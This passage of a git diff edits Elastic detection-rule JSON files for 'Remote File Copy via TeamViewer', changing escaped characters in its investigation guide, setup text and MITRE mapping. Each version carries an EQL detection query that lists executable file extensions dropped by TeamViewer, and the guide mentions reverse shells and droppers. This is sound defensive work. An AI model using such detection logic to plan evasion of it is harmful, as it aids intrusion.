EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json index 677cb764bac..58c870069bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json index f0d484fabeb..cc95e9439a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json index ecb1e09b1af..13cd2c00a5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json index bcd09da45eb..058b9c1b53e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert 